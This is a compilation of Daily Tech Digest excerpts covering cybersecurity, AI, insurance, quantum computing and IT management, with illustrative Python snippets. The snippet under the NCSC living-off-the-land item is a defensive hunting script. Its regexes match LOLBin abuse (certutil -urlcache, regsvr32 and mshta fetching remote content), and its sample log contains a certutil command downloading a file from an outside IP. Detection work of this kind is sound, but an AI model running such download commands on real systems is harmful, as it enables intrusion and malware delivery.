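# better edge context, at the cost of redundant storage.
chunks = chunk_text("some long document " * 200)
```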


What is quantum supremacy?

A definitive achievement of quantum supremacy will require either a significant reduction in quantum hardware's error rates or a better theoretical understanding of what kind of noise classical approaches can exploit to help simulate the behavior of error-prone quantum computers, Fefferman said. But this back-and-forth between quantum and classical approaches is helping push the field forwards, he added, creating a virtuous cycle that is helping quantum hardware developers understand where they need to improve. "Because of this cycle, the experiments have improved dramatically," Fefferman said. "And as a theorist coming up with these classical algorithms, I hope that eventually, I'm not able to do it anymore." While it's uncertain whether quantum supremacy has already been reached, it's clear that we are on the cusp of it, Benjamin said. But it's important to remember that reaching this milestone would be a largely academic and symbolic achievement, as the problems being tackled are of no practical use. "We're at that threshold, roughly speaking, but it isn't an interesting threshold, because on the other side of it, nothing magic happens," Benjamin said. ... That's why many in the field are refocusing their efforts on a new goal: demonstrating "quantum utility," or the ability to show a significant speedup over classical computers on a practically useful problem.


Shift left security — Good intentions, poor execution, and ways to fix it

One of the first steps is changing the way security is integrated into development. Instead of focusing on a “gotcha”, after-the-fact approach, we need security to assist us as early as possible in the process: as we write the code. By guiding us as we’re still in ‘work-in-progress’ mode with our code, security can adopt a positive coaching and helping stance, nudging us to correct issues before they become problems and go clutter our backlog. ... The security tools we use need to catch vulnerabilities early enough so that nobody circles back to fix boomerang issues later. Very much in line with my previous point, detecting and fixing vulnerabilities as we code saves time and preserves focus. This also reduces the back-and-forth in peer reviews, making the entire process smoother and more efficient. By embedding security more deeply into the development workflow, we can address security issues without disrupting productivity. ... When it comes to security training, we need a more focused approach. Developers don’t need to become experts in every aspect of code security, but we do need to be equipped with the knowledge that’s directly relevant to the work we’re doing, when we’re doing it — as we code. Instead of broad, one-size-fits-all training programs, let’s focus on addressing specific knowledge gaps we personally have. 
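As one example of what "security as we code" can look like, here is an illustrative pre-commit-style scanner that flags likely hardcoded secrets before they ever reach peer review. The patterns are hypothetical and far from a complete ruleset; the point is the timing, catching the issue while the code is still work-in-progress.

```python
# Illustrative pre-commit check for hardcoded secrets (sketch, not a product).
import re
import sys

SECRET_PATTERNS = [
    # e.g. api_key = "abc123...", secret = '...', token = "..."
    re.compile(r"(api[_-]?key|secret|token)\s*=\s*['\"][^'\"]{8,}['\"]", re.I),
    re.compile(r"-----BEGIN (RSA |EC )?PRIVATE KEY-----"),
]

def scan(path: str) -> int:
    findings = 0
    with open(path, encoding="utf-8", errors="ignore") as f:
        for lineno, line in enumerate(f, start=1):
            for pattern in SECRET_PATTERNS:
                if pattern.search(line):
                    print(f"{path}:{lineno}: possible hardcoded secret")
                    findings += 1
    return findings

if __name__ == "__main__":
    # Non-zero exit blocks the commit, nudging a fix before review.
    sys.exit(1 if any(scan(p) for p in sys.argv[1:]) else 0)
```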



Quote for the day:

“Whenever you see a successful person, you only see the public glories, never the private sacrifices to reach them.” -- Vaibhav Shah

Daily Tech Digest - July 08, 2024

How insurtech startups are addressing the challenges of slow processes in the insurance sector

Even though compliance and regulation are critical for the security of both the insurers and customers, the regulatory process can be quite long. Compliance requirements demand meticulous attention to detail and can significantly prolong the approval process for new products and services. Another factor can be risk aversion: within the industry it fosters a culture of caution, where insurers are hesitant to embrace change and experiment with new approaches to product development and underwriting. ... One of the solutions for these industrial challenges lies in the collaboration of the insurance sector and the latest technologies. Insurtech solutions offer myriad innovative tools and technologies that promise to streamline product development and automate underwriting processes. One such solution gaining traction is artificial intelligence (AI) and machine learning algorithms, which can analyse vast amounts of data in real time to assess risk and expedite underwriting decisions. 


Transforming Business Practices Through Augmented Intelligence

While AI raises apprehensions about potential job displacement, viewing it solely as a threat overlooks its capacity to enhance human capabilities, as evidenced by historical technological advancements. Training and education play a key role in this process, as AI has become an integral part of our reality and must be harnessed to its full potential. It is essential to align the use of artificial intelligence with the overall strategy of the organization for smooth integration of applications with data, processes, and collaboration between stakeholders. In a landscape where the internet simplifies transactions, software provides tools, and AI leverages data to make informed decisions, training and education become crucial. ... At its core, technology has always revolved around processing data. When viewed through the lens of enterprise architecture, an AI-powered machine learning tool can adeptly craft roadmaps tailored for businesses. Through advanced AI analytics, automation, and recommendation systems, enterprise architecture facilitates more informed and expedited decision-making processes.


Request for proposal vs. request for partner: what works best for you?

An RFProposal is an efficient choice when the nature of the work is standardized, while an RFPartner is the better choice when the buying organization is seeking a strategic partner for the overall best fit to meet its needs. ... When organizations shift to wanting to find a partner with the best possible solution, it’s important to understand the nature of the selection criteria change. With an RFPartner, buyers evaluate suppliers not only based on technical capabilities but also on the best value of the solution. ... “On the surface, an RFPartner sounds like a heavy lift, but we find that the overall time and effort is about the same,” he says. “In an RFProposal, the buyer is spending more time upfront defining the specs and in contentious negotiations. The RFPartner process flips this on its head and creates a more integrated bid solution that generates better solutions, spending more time together with the supplier co-creating, especially if your aim is making the shift to a highly collaborative vested business model to achieve strategic business outcomes.”


If you’re a CISO without D&O insurance, you may need to fight for it

D&O insurance covers the personal liabilities of corporate directors and officers in the event of incidents that lead to financial losses, reputational damage, or legal consequences. Without adequate D&O coverage, CISOs are left vulnerable, highlighting the need for this in an organization’s risk-management strategy. ... Lisa Hall, CISO at privately held Safebase, agrees that CISOs at all companies should be covered under their organizations’ D&O insurance policies, particularly in light of these new regulations. “I do think adding CISOs to D&O insurance will be more and more of a thing, and there is, for sure, more chatter in my CISO groups about how companies are handling this,” she says. “A lot of CISOs are also taking out errors and omissions insurance personally. I have that just for the consulting and advisory work I do.” ... “A lot of CISOs are thinking about this, especially after SolarWinds,” she says. “And if we feel that we’re not 100% protected for any decision we make, and we can be personally liable for a breach or possible incident even if we do the right thing, it’s really pushing CISOs to say, ‘Hey, company, I’ll join if you cover me or give me a different title.’ “


How DORA is fortifying Europe’s financial future with a new take on operational resilience

For DORA, digital operational resilience very simply means “the ability of a financial entity to build, assure, and review its operational integrity and reliability by ensuring, either directly or indirectly through the use of services provided by ICT third-party service providers, the full range of ICT-related capabilities needed to address the security of the network and information systems which a financial entity uses, and which support the continued provision of financial services and their quality, including throughout disruptions”. Developing on this statement in a conversation with FinTech Futures, Simon Treacy, a senior associate at global law firm Linklaters, describes DORA as “a very prescriptive framework for financial entities, primarily to build and improve the way that they manage ICT risk”. “It applies very broadly across the EU regulated financial sector,” he continues, “and really part of its aim is to harmonise standards so that the smallest payments firm is subject to the same rules for operational resilience as the biggest banks and insurers.”


Data Sprawl: Continuing Problem for the Enterprise or an Untapped Opportunity?

Data fabric technologies excel in integrating and managing data across various environments. However, they often focus on conventional data sources like databases, data lakes, or data warehouses. The result is a gap in integrating and extracting value from data residing in numerous SaaS applications, as they may not seamlessly fit into these traditional data repositories. The combined solution of data fabric and iPaaS can address complex business challenges, such as integrating data from SaaS applications with traditional data sources. This capability is particularly valuable in today’s business landscape, where data is increasingly scattered across various cloud and on-premises environments. The merging of data fabric and iPaaS technologies offers a groundbreaking solution to this challenge, opening the door to new opportunities in data management and analysis. The integration of data fabric with iPaaS addresses the complexity and expertise-dependency in iPaaS. Data fabric can enable users to discover, understand, and verify data before integration flows are built. 


AI’s moment of disillusionment

AI, whether generative AI, machine learning, deep learning, or you name it, was never going to be able to sustain the immense expectations we’ve foisted upon it. I suspect part of the reason we’ve let it run so far for so long is that it felt beyond our ability to understand. It was this magical thing, black-box algorithms that ingest prompts and create crazy-realistic images or text that sounds thoughtful and intelligent. And why not? The major large language models (LLMs) have all been trained on gazillions of examples of other people being thoughtful and intelligent, and tools like ChatGPT mimic back what they’ve “learned.” ... We go through this process of inflated expectations and disillusionment with pretty much every shiny new technology. Even something as settled as cloud keeps getting kicked around. My InfoWorld colleague, David Linthicum, recently ripped into cloud computing, arguing that “the anticipated productivity gains and cost savings have not materialized, for the most part.” I think he’s overstating his case, but it’s hard to fault him, given how much we (myself included) sold cloud as the solution for pretty much every IT problem.


How nation-state cyber attacks disrupt public services and undermine citizen trust

While nation-states do have advanced capabilities and visibility that are hard or impossible for cyber criminals to replicate, the general strategy for attackers is to target vulnerable perimeter devices such as VPNs or firewalls as an entry point to the network. Next they focus on obtaining privileged credentials while leveraging legitimate software to masquerade as normal activity while they scout the environments for valuable data or large repositories to disrupt. It’s important to note that the commonly exploited vulnerabilities in government IT systems are not distinctly different from the vulnerabilities exploited more broadly. Government IT systems are often extremely diverse and thus, subject to a variety of exploits. ... Currently, there are numerous policies and regulations, both domestically and internationally, which are inconsistent and vary in their requirements. These administrative requirements take significant resources which could otherwise be used to strengthen a company’s cybersecurity program. 


How Quantum Computing Will Revolutionize Cloud Analytics

As we peer into the future of quantum computing in cloud analytics, the emphasis on collaboration and continuous innovation becomes undeniable. Integrating quantum technologies with cloud systems is not just a technological upgrade but a paradigm shift requiring robust partnerships across academia, industry, and government sectors. For instance, IBM’s quantum network includes over 140 members, including start-ups, research labs, and educational institutions, working together to advance quantum computing. This collaborative model is essential because the challenges in quantum computing are not just about hardware or software alone but about creating an ecosystem that supports an entirely new kind of computing. That ecosystem comprises components such as quantum hardware development, quantum algorithms, software tools, and educational resources. The network has also made significant achievements, such as developing quantum hardware like the IBM Quantum System One, advancing quantum algorithms for practical applications in chemistry and materials science, and creating the Qiskit software development kit to make quantum programming more accessible.
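As a taste of what Qiskit makes accessible, here is a textbook two-qubit Bell-state circuit, about as short as a quantum program gets (requires the qiskit package).

```python
# Minimal Qiskit example: build and display a Bell-state circuit.
from qiskit import QuantumCircuit

qc = QuantumCircuit(2, 2)
qc.h(0)               # put qubit 0 into superposition
qc.cx(0, 1)           # entangle qubit 1 with qubit 0
qc.measure([0, 1], [0, 1])  # measurements land in the two classical bits
print(qc.draw())      # ASCII diagram of the circuit
```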


How continuous learning is reshaping the workforce

Gone are the days when lengthy training programs were sought after and people took breaks from their careers to pick up an upskilling program. Navpreet Singh highlights that upskilling will become an ongoing process integrated into the workday. “The focus will shift from acquiring specific job skills to fostering adaptability and lifelong learning. Critical thinking, problem-solving, and creativity will be paramount as automation takes over routine tasks. Traditional ways of learning may not always reflect the skills needed. Alternative credentials, like badges and micro-credentials, will showcase the specific skills employees possess, making them more competitive. By embracing this future of upskilling, we can ensure our workforce is adaptable, future-proof, and ready to drive innovation in the ever-evolving automotive industry,” explains Singh. Within the next decade or so, we will see greater demand for agile ed-tech tools that help employees learn on the go and prepare them for new roles, says Daniele Merlerati, Chief Regional Officer APAC, Baltics, Benelux at Gi Group Holding.



Quote for the day:

"Perseverance is failing nineteen times and succeeding the twentieth." -- Julie Andrews

Daily Tech Digest - July 01, 2024

The dangers of voice fraud: We can’t detect what we can’t see

The inherent imperfections in audio offer a veil of anonymity to voice manipulations. A slightly robotic tone or a static-laden voice message can easily be dismissed as a technical glitch rather than an attempt at fraud. This makes voice fraud not only effective but also remarkably insidious. Imagine receiving a phone call from a loved one’s number telling you they are in trouble and asking for help. The voice might sound a bit off, but you attribute this to the wind or a bad line. The emotional urgency of the call might compel you to act before you think to verify its authenticity. Herein lies the danger: Voice fraud preys on our readiness to ignore minor audio discrepancies, which are commonplace in everyday phone use. Video, on the other hand, provides visual cues. There are clear giveaways in small details like hairlines or facial expressions that even the most sophisticated fraudsters have not been able to get past the human eye. On a voice call, those warnings are not available. That’s one reason most mobile operators, including T-Mobile, Verizon and others, make free services available to block — or at least identify and warn of — suspected scam calls.


Provider or partner? IT leaders rethink vendor relationships for value

Vendors achieve partner status in McDaniel’s eyes by consistently demonstrating accountability and integrity; getting ahead of potential issues to ensure there are no interruptions or problems with the provided products or services; and understanding his operations and objectives. ... McDaniel, other CIOs, and CIO consultants agree that IT leaders don’t need to cultivate partnerships with every vendor; many, if not most, can remain straight-out suppliers, where the relationship is strictly transactional, fixed-fee, or fee-for-service based. That’s not to suggest those relationships can’t be chummy, but a good personal rapport between the IT team and the supplier’s team is not what partnership is about. A provider-turned-partner is one that gets to know the CIO’s vision and brings to the table ways to get there together, Bouryng says. ... As such, a true partner is also willing to say no to proposed work that could take the pair down an unproductive path. It’s a sign, Bouryng says, that the vendor is more interested in reaching a successful outcome than merely scheduling work to do.


In the AI era, data is gold. And these companies are striking it rich

AI vendors have, sometimes controversially, made deals with organizations like news publishers, social media companies, and photo banks to license data for building general-purpose AI models. But businesses can also benefit from using their own data to train and enhance AI to assist employees and customers. Examples of source material can include sales email threads, historical financial reports, geographic data, product images, legal documents, company web forum posts, and recordings of customer service calls. “The amount of knowledge—actionable information and content—that those sources contain, and the applications you can build on top of them, is really just mindboggling,” says Edo Liberty, founder and CEO of Pinecone, which builds vector database software. Vector databases store documents or other files as numeric representations that can be readily mathematically compared to one another. That’s used to quickly surface relevant material in searches, group together similar files, and feed recommendations of content or products based on past interests. 
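
To make the idea of "numeric representations that can be readily mathematically compared" concrete, here is a minimal sketch of similarity search using cosine similarity. The embeddings are made up for illustration; a production vector database such as Pinecone indexes millions of vectors with approximate nearest-neighbor search rather than this brute-force loop:

```python
import numpy as np

def cosine_similarity(a: np.ndarray, b: np.ndarray) -> float:
    """Cosine similarity: 1.0 means identical direction, near 0 means unrelated."""
    return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

# Toy 4-dimensional embeddings; real models produce hundreds of dimensions.
docs = {
    "refund policy":      np.array([0.9, 0.1, 0.0, 0.2]),
    "quarterly earnings": np.array([0.1, 0.8, 0.3, 0.0]),
    "return an item":     np.array([0.8, 0.2, 0.1, 0.3]),
}
query = np.array([0.85, 0.15, 0.05, 0.25])  # e.g. "how do I get my money back"

# Brute-force ranking; vector databases replace this with ANN indexes.
for name, vec in sorted(docs.items(),
                        key=lambda kv: cosine_similarity(query, kv[1]),
                        reverse=True):
    print(f"{cosine_similarity(query, vec):.3f}  {name}")
```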


Machine Vision: The Key To Unleashing Automation's Full Potential

Machine vision is a class of technologies that process information from visual inputs such as images, documents, computer screens, and videos. Its value in automation lies in its ability to capture and process large quantities of documents, images, and video quickly and efficiently, at volumes and speeds far in excess of human capability. ... Machine vision-based technologies are even becoming central to the creation of automations themselves. For example, instead of relying on human workers to describe the processes being automated, the process is recorded, and machine vision software, combined with other technologies, captures it end-to-end, providing the input needed to automate much of the work of programming the digital workers (bots). ... Machine vision is integral to maximizing the impact of advanced automation technologies on business operations and paving the way for increased capabilities in the automation space.
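
As a flavor of what "processing information from visual inputs" looks like in code, here is a minimal OpenCV sketch that isolates candidate content regions in a scanned document. The file path is hypothetical, and a real automation pipeline would hand the detected regions to OCR or a downstream model:

```python
import cv2  # assumes: pip install opencv-python

# Load a scanned document (hypothetical path) and normalise it.
image = cv2.imread("scanned_invoice.png")
if image is None:
    raise FileNotFoundError("scanned_invoice.png not found")
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)

# Binarise so that ink is white on black, then find connected regions.
_, binary = cv2.threshold(gray, 0, 255,
                          cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)
contours, _ = cv2.findContours(binary, cv2.RETR_EXTERNAL,
                               cv2.CHAIN_APPROX_SIMPLE)

# Keep regions large enough to be text blocks or tables, not specks.
regions = [cv2.boundingRect(c) for c in contours
           if cv2.contourArea(c) > 500]
print(f"found {len(regions)} candidate regions for OCR")
```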


Put away your credit cards — soon you might be paying with your face

Biometric purchases using facial recognition are beginning to gain some traction. The restaurant CaliExpress by Flippy, a fully automated fast-food restaurant, is an early adopter. Whole Foods stores offer pay-by-palm, an alternative biometric to facial recognition; given that they already use biometrics, facial recognition is likely to appear in their stores at some point. ... Just as credit and debit cards have overtaken cash as the dominant means of making purchases, biometrics like facial recognition could eventually become the dominant way to pay. There will, however, be real costs during such a transition, largely absorbed by consumers in higher prices. The software and hardware required to implement such systems will be costly, pushing them out of reach for many small- and medium-size businesses. However, as facial recognition systems become more efficient and reliable, and losses from theft are reduced, an equilibrium will be reached that makes the additional costs more modest and manageable to absorb.


Technologists must be ready to seize new opportunities

For technologists, this new dynamic represents a profound (and daunting) change. They’re being asked to report on application performance in a more business-focussed, strategic way and to engage in conversations around experience at a business level. They’re operating outside their comfort zone, far beyond the technical reporting and discussions they’ve previously encountered. Of course, technologists are used to rising to a challenge and pivoting to meet the changing needs of their organisations and senior leaders. We saw this during the pandemic, and many will (rightly) be excited about the opportunity to expand their skills and knowledge and to elevate their standing within their organisations. The challenge many technologists face, however, is that they currently lack the tools and insights needed to operate in a strategic manner. Many don’t have full visibility across their hybrid environments and struggle to manage and optimise application availability, performance and security in an effective and sustainable way. They can’t easily detect issues, and even when they do, it is difficult to quickly understand root causes and dependencies in order to fix problems before they impact end-user experience.


Vulnerability management empowered by AI

Using AI will take vulnerability management to the next level. AI not only reduces analysis time but also identifies threats more effectively. ... AI-driven systems can identify patterns and anomalies that signify potential vulnerabilities or attacks. Converting raw logs into structured data and charts makes analysis simpler and quicker. Incidents should be prioritized by security risk, with notifications triggered for immediate action. Self-learning is another area where AI can be applied: trained continuously on fresh data, it stays current with a changing environment and can address new and emerging threats, flagging both high-risk and previously unseen ones. Implementing AI requires iterations to train the model, which can be time-consuming, but over time it becomes easier to identify threats and flaws. AI-driven platforms constantly gather insights from data, adjusting to shifting landscapes and emerging risks. As they progress, they enhance their precision and efficacy in pinpointing weaknesses and offering practical guidance.
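
The claim that AI-driven systems can "identify patterns and anomalies" is easiest to see with a small sketch. This one uses scikit-learn's IsolationForest on made-up per-host log features; it illustrates the idea, not a production vulnerability scanner:

```python
import numpy as np
from sklearn.ensemble import IsolationForest

# Made-up per-host features extracted from logs:
# [requests_per_min, failed_logins, distinct_ports_touched]
normal = np.random.default_rng(0).normal([50, 2, 3], [10, 1, 1], size=(200, 3))
suspicious = np.array([[300, 40, 55],    # scanning plus brute-force pattern
                       [55, 30, 4]])     # credential-stuffing pattern
X = np.vstack([normal, suspicious])

model = IsolationForest(contamination=0.01, random_state=0).fit(X)
scores = model.decision_function(X)      # lower score = more anomalous
flags = model.predict(X)                 # -1 = anomaly, 1 = normal

for row, score in zip(X[flags == -1], scores[flags == -1]):
    print(f"anomalous host profile {np.round(row, 1)} (score {score:.3f})")
```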


Why every company needs a DDoS response plan

Given the rising number of DDoS attacks each year and the reality that DDoS attacks are frequently used in more sophisticated hacking attempts to apply maximum pressure on victims, a DDoS response plan should be part of every company’s cybersecurity tool kit. After all, it’s not just temporary loss of access to a website or application that is at stake: a business’s failure to withstand a DDoS attack and rapidly recover can result in lost revenue, compliance failures, and damage to brand reputation and public perception. Successful handling of a DDoS attack depends entirely on a company’s preparedness and execution of existing plans. Like any business continuity strategy, a DDoS response plan should be a living document that is tested and refined over the years. At the highest level, it should consist of five stages: preparation, detection, classification, reaction, and postmortem reflection. Each phase informs the next, and the cycle improves with each iteration.
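
As a tiny illustration of the detection stage, the sketch below flags source addresses whose request rate exceeds a threshold within a sliding window. The window and threshold values are invented for the example, and real deployments lean on edge providers and dedicated scrubbing services rather than application-level counters alone:

```python
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 10     # invented values for illustration
MAX_REQUESTS = 100      # per source IP per window

hits = defaultdict(deque)

def record_request(src_ip, now=None):
    """Return True if src_ip is within limits, False if it looks like a flood."""
    now = time.monotonic() if now is None else now
    q = hits[src_ip]
    q.append(now)
    while q and now - q[0] > WINDOW_SECONDS:   # drop requests outside window
        q.popleft()
    return len(q) <= MAX_REQUESTS

# Simulated burst of 150 requests in 1.5 seconds from one address:
for i in range(150):
    ok = record_request("203.0.113.7", now=float(i) * 0.01)
print("allowed" if ok else "flagged for the classification stage")
```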


Reduce security risk with 3 edge-securing steps

Over the past several years, web-based SSL VPNs have been targeted and used to gain remote access. Consider evaluating how your firm allows remote access and how often your VPN solution has been attacked or put at risk. ... “The severity of the vulnerabilities and the repeated exploitation of this type of vulnerability by actors means that NCSC recommends replacing solutions for secure remote access that use SSL/TLS with more secure alternatives,” the authority says. “The NCSC recommends internet protocol security (IPsec) with internet key exchange (IKEv2). Other countries’ authorities have recommended the same.” ... Pay extra attention to how credentials that need to be accessed are protected from unauthorized access. Follow best-practice processes for securing passwords, and ensure each user has appropriate credentials and access. ... When using cloud services, ensure that only vendors you trust or have thoroughly vetted have access to them.

The real key to machine learning success is something that is mostly missing from genAI: the constant tuning of the model. “In ML and AI engineering,” Shankar writes, “teams often expect too high of accuracy or alignment with their expectations from an AI application right after it’s launched, and often don’t build out the infrastructure to continually inspect data, incorporate new tests, and improve the end-to-end system.” It’s all the work that happens before and after the prompt, in other words, that delivers success. For genAI applications, partly because of how fast it is to get started, much of this discipline is lost. ... As with software development, where the hardest work isn’t coding but rather figuring out which code to write, the hardest thing in AI is figuring out how or if to apply AI. When simple rules need to yield to more complicated rules, Valdarrama suggests switching to a simple model. Note the continued stress on “simple.” As he says, “simplicity always wins” and should dictate decisions until more complicated models are absolutely necessary.
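
A minimal sketch of the "simplicity always wins" point: compare a hand-written rule against a simple model on held-out data before reaching for anything heavier. The data here is synthetic and the threshold rule is invented for illustration:

```python
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split

# Synthetic churn-style data: [logins_last_month, support_tickets]
rng = np.random.default_rng(1)
X = rng.normal([10, 2], [5, 2], size=(500, 2))
# Ground truth loosely tied to low activity, with 10% label noise.
y = ((X[:, 0] < 6) ^ (rng.random(500) < 0.1)).astype(int)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=1)

# Step 1: a simple rule -- the baseline every model must beat.
rule_pred = (X_te[:, 0] < 6).astype(int)
print("rule accuracy: ", accuracy_score(y_te, rule_pred))

# Step 2: a simple model, adopted only if it beats the rule on held-out data.
model = LogisticRegression().fit(X_tr, y_tr)
print("model accuracy:", accuracy_score(y_te, model.predict(X_te)))
```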



Quote for the day:

“The vision must be followed by the venture. It is not enough to stare up the steps - we must step up the stairs.” -- Vance Havner

Daily Tech Digest - February 08, 2024

The do-it-yourself approach to MDM

If you’re comfortable taking on extra responsibilities and costs, the next big question is whether you can get the right tool — or, more often, the many tools — you need. This is where you need a detailed understanding of the mobile platforms you have to manage and of every platform that must integrate with them for everything to work. MDM isn’t an island. It integrates with a sometimes staggering number of enterprise components. Some, like identity management, are obvious; others, like log management or incident response, are less obvious when you think about successful mobility management. Then there are the external platforms that need connections. Think identity management — Entra, Workspace, Okta — and things like Apple Business Manager, which you need to work well in both everyday and unusual situations. Then tack on the network, security, auditing, load balancing, inventory, the help desk, and various other services. You’re going to need something that connects with everything you already have, or you could find yourself saddled with multiple migrations.


NCSC warns CNI operators over ‘living-off-the-land’ attacks

The NCSC said that even organisations with the most mature cyber security techniques could easily fail to spot a living-off-the-land attack, and assessed it is “likely” that such activity poses a clear threat to CNI in the UK. ... In particular, it warned, both Chinese and Russian hackers have been observed living-off-the-land on compromised CNI networks – one prominent exponent of the technique is the GRU-sponsored advanced persistent threat (APT) actor known as Sandworm, which uses LOLbins extensively to attack targets in Ukraine. “It is vital that operators of UK critical infrastructure heed this warning about cyber attackers using sophisticated techniques to hide on victims’ systems,” said NCSC operations director Paul Chichester. “Threat actors left to carry out their operations undetected present a persistent and potentially very serious threat to the provision of essential services. Organisations should apply the protections set out in the latest guidance to help hunt down and mitigate any malicious activity found on their networks.” "In this new dangerous and volatile world where the frontline is increasingly online, we must protect and future proof our systems,” added deputy prime minister Oliver Dowden.
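
Living-off-the-land activity hides inside legitimate tooling, so hunting for it usually means scanning process-creation logs for native binaries used in unusual ways. The sketch below checks command lines against a few well-known LOLBin abuse patterns (certutil fetching URLs, regsvr32 loading remote scriptlets, mshta launching remote HTAs); the log format is simplified for illustration:

```python
import re

# A few well-known LOLBin abuse patterns (simplified for illustration).
SUSPICIOUS = [
    re.compile(r"certutil(\.exe)?\s+.*-urlcache", re.I),     # file download
    re.compile(r"regsvr32(\.exe)?\s+.*/i:https?://", re.I),  # remote scriptlet
    re.compile(r"mshta(\.exe)?\s+https?://", re.I),          # remote HTA
]

def hunt(process_log_lines):
    """Yield log lines whose command line matches a known LOLBin pattern."""
    for line in process_log_lines:
        if any(p.search(line) for p in SUSPICIOUS):
            yield line

sample_log = [
    "4688 host1 cmd.exe /c dir",
    "4688 host2 certutil.exe -urlcache -split -f http://203.0.113.9/a.txt a.txt",
    "4688 host3 notepad.exe report.txt",
]
for hit in hunt(sample_log):
    print("review:", hit)
```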


What Are the Core Principles of Good API Design?

Your API should also be idiomatic to the programming language it is written for and respect the way that language works. For example, if the API is to be used with Java, use exceptions for errors rather than returning an error code as you might in C. APIs should follow the principle of least surprise. Part of the way this can be achieved is through symmetry: if you offer add and remove methods, they should be applied everywhere they are appropriate. A good API comprises a small number of concepts; someone learning it shouldn’t have to absorb too many things. This doesn’t necessarily apply to the number of methods, classes or parameters, but rather to the conceptual surface area the API covers. Ideally, an API should set out to achieve only one thing. It is also best to avoid adding anything for its own sake. “When in doubt, leave it out,” as Bloch puts it. You can usually add something to an API if it turns out to be needed, but you can never remove things once an API is public. As noted earlier, your API will need to evolve over time, so a key part of the design is being able to make changes further down the line without destroying everything.
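
To ground the exceptions-over-error-codes and symmetry points, here is a hypothetical sketch of a small collection-style API in Python; all names are invented for illustration:

```python
class SubscriberNotFound(Exception):
    """Raised instead of returning an error code, as the language idiom demands."""

class MailingList:
    def __init__(self):
        self._subscribers = set()

    # Symmetry: every operation has its natural counterpart.
    def add(self, email: str) -> None:
        self._subscribers.add(email)

    def remove(self, email: str) -> None:
        if email not in self._subscribers:
            raise SubscriberNotFound(email)   # idiomatic failure signal
        self._subscribers.remove(email)

    def __contains__(self, email: str) -> bool:
        # Least surprise: the `in` operator works the way users expect.
        return email in self._subscribers

ml = MailingList()
ml.add("ada@example.com")
assert "ada@example.com" in ml
ml.remove("ada@example.com")
```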


Russian Ransomware Gang ALPHV/BlackCat Resurfaces with 300GB of Stolen US Military Documents

The ALPHV/BlackCat ransomware group has threatened to publish and sell 300 GB of stolen military documents unless Technica Corporation gets in touch. “If Technica does not contact us soon, the data will either be sold or made public,” the ransomware gang threatened. However, there is no guarantee that the ransomware gang would not pass the military documents to adversaries even after the military contractor pays the ransom. The BlackCat ransomware gang also posted screenshots of the leaked military documents as proof, displaying the victims’ names, social security numbers, job roles and locations, and clearance levels. Other military documents include corporate information such as billing invoices and contracts for private companies and federal agencies such as the FBI and the US Air Force. So far, the motive of the cyber attack remains unknown, but it’s common for threat actors to feign financial motives to conceal their true geopolitical objectives. While the leaked military documents may not be classified, they still contain crucial personal information that state-linked threat actors could use for targeting.


6 best practices for better vendor management

To build a stronger relationship with vendors, “CIOs should bring them into the fold regarding their priorities and potential concerns about what may —or may not — lie ahead, from a regulatory perspective or the general economic climate, for example,” says Kevin Beasley, CIO at VAI, a midmarket ERP software developer. “A few years ago, supply-chain snags had CIOs looking for new technology,” Beasley says. “Lately, a talent shortage means CIOs are pushing for more automation. CIOs that don’t delay posing questions about how vendor products can solve such challenges, but also take the time to hear the information, will build a valuable rapport that can benefit both parties.” Part of building a collaborative partnership is staying in close contact. It’s important to establish clear communication channels and schedule regular check-ins with active vendors, “to understand performance, expectations, and progress while recognizing that no process or service goes perfectly all the time,” says Patrick Gilgour, managing director of the Technology Strategy and Advisory practice at consulting firm Protiviti.


Three commitments of the data center industry for 2024

To become more authentic and credible in these reputation-building dialogues and go beyond the data center, we must be more representative of the people our infrastructure ultimately serves. Although progress has been made, we must keep evolving. We need diversity of background, experience, ethnicity, age, and outlook in order to fully embrace the challenges of digital infrastructure. The range of roles, skillsets, and opportunities in the sector is far wider than many outside the industry recognize. Creating organizations where every person can be themselves and deliver in line with their ethics, values, and beliefs is a prerequisite for building a positive reputation. And of course, the more attractive an industry we become, the more great candidates, partners, and supporters we’ll attract. ... Speaking of inspiring the next generation, 2024 can be the year in which we embrace youth. How do we attract more young people into the industry? By inspiring them. The data center sector is a dynamic, exciting, and rapidly growing sector. We want to ensure this is being effectively articulated in print, across social media, and online.


Is your cloud security strategy ready for LLMs?

When employees and contractors use those public models, especially for analysis, they will be feeding those models internal data. The public models then learn from that data and may leak those sensitive corporate secrets to a rival who asks a similar question. “Mitigating the risk of unauthorized use of LLMs, especially inadvertent or intentional input of proprietary, confidential, or material non-public data into LLMs” is tricky, says George Chedzhemov, BigID’s cybersecurity strategist. Cloud security platforms can help, he adds, especially for access controls and user authentication, encryption of sensitive data, data loss prevention, and network security. Other tools are available for data discovery and surfacing sensitive information in structured, unstructured, and semi-structured repositories. “It is impossible to protect data that the organization has lost track of, data that has been over-permissioned, or data that the organization is not even aware exists, so data discovery should be the first step in any data risk remediation strategy, including one that attempts to address AI/LLM risks,” says Chedzhemov.
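
One practical mitigation the passage gestures at, catching sensitive data before it reaches a public model, can be sketched with simple pattern matching. Real DLP products go far beyond regexes; the patterns and placeholder tags here are invented for illustration:

```python
import re

# Minimal redaction patterns; production DLP covers many more data classes.
PATTERNS = {
    "EMAIL": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "SSN":   re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "CARD":  re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

def redact(text: str) -> str:
    """Replace sensitive spans with placeholder tags before any LLM call."""
    for label, pattern in PATTERNS.items():
        text = pattern.sub(f"[{label}]", text)
    return text

prompt = "Summarise: Jane (jane@corp.com, SSN 123-45-6789) disputed a charge."
print(redact(prompt))
# -> "Summarise: Jane ([EMAIL], SSN [SSN]) disputed a charge."
```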


Shadow AI poses new generation of threats to enterprise IT

